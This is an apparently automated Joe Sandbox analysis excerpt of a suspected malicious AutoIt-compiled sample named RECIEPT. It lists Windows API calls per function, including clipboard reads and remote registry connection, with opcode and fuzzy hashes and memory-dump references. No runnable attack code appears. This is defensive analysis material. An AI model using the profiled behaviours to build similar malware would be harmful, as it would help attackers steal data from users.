                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Cursor$Load
                                        • String ID:
                                        • API String ID: 1675784387-0
                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                        APIs
                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                        • GetSysColor.USER32(00000012), ref: 00430933
                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                        • GetSysColor.USER32(00000011), ref: 00430979
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID:
                                        • API String ID: 1582027408-0
                                        • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                        • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CloseConnectCreateRegistry
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 3217815495-966354055
                                        • Opcode ID: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                        • Opcode Fuzzy Hash: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 004566AE
                                        • GetDesktopWindow.USER32 ref: 004566C3
                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                        • DestroyWindow.USER32(?), ref: 00456746
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                        • CopyRect.USER32(?,?), ref: 004568BE
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                        • String ID: ($,$tooltips_class32
                                        • API String ID: 225202481-3320066284
                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                        APIs
                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                        • CloseClipboard.USER32 ref: 0046DD0D
                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                        • CloseClipboard.USER32 ref: 0046DD41
                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                        • CloseClipboard.USER32 ref: 0046DD99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                        • String ID:
                                        • API String ID: 15083398-0
                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                        APIs
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                        • String ID: @$AutoIt v3 GUI
                                        • API String ID: 867697134-3359773793
                                        • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                        • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 1503153545-1459072770
                                        • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                        • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __wcsicoll$__wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                        • API String ID: 790654849-32604322
                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                        • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                        • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                        • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                        APIs
                                          • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                        • _fseek.LIBCMT ref: 00452B3B
                                        • __wsplitpath.LIBCMT ref: 00452B9B
                                        • _wcscpy.LIBCMT ref: 00452BB0
                                        • _wcscat.LIBCMT ref: 00452BC5
                                        • __wsplitpath.LIBCMT ref: 00452BEF
                                        • _wcscat.LIBCMT ref: 00452C07
                                        • _wcscat.LIBCMT ref: 00452C1C
                                        • __fread_nolock.LIBCMT ref: 00452C53
                                        • __fread_nolock.LIBCMT ref: 00452C64
                                        • __fread_nolock.LIBCMT ref: 00452C83
                                        • __fread_nolock.LIBCMT ref: 00452C94
                                        • __fread_nolock.LIBCMT ref: 00452CB5
                                        • __fread_nolock.LIBCMT ref: 00452CC6
                                        • __fread_nolock.LIBCMT ref: 00452CD7
                                        • __fread_nolock.LIBCMT ref: 00452CE8
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                        • __fread_nolock.LIBCMT ref: 00452D78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                        • String ID:
                                        • API String ID: 2054058615-0
                                        • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                        • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                        • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                        • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window
                                        • String ID: 0
                                        • API String ID: 2353593579-4108050209
                                        • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                        • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                        • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                        • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                        APIs
                                        • GetSysColor.USER32(0000000F), ref: 0044A05E
                                        • GetClientRect.USER32(?,?), ref: 0044A0D1
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                        • GetWindowDC.USER32(?), ref: 0044A0F6
                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                        • ReleaseDC.USER32(?,?), ref: 0044A11B
                                        • GetSysColor.USER32(0000000F), ref: 0044A131
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                        • GetSysColor.USER32(0000000F), ref: 0044A14F
                                        • GetSysColor.USER32(00000005), ref: 0044A15B
                                        • GetWindowDC.USER32(?), ref: 0044A1BE
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                        • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                        • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                        • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                        • GetSysColor.USER32(00000008), ref: 0044A265
                                        • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                        • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                        • GetStockObject.GDI32(00000005), ref: 0044A28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                        • String ID:
                                        • API String ID: 1744303182-0
                                        • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                        • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                        • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                        • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                        • __mtterm.LIBCMT ref: 00417C34
                                          • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                          • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                          • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                        • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                        • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                        • __init_pointers.LIBCMT ref: 00417CE6
                                        • __calloc_crt.LIBCMT ref: 00417D54
                                        • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
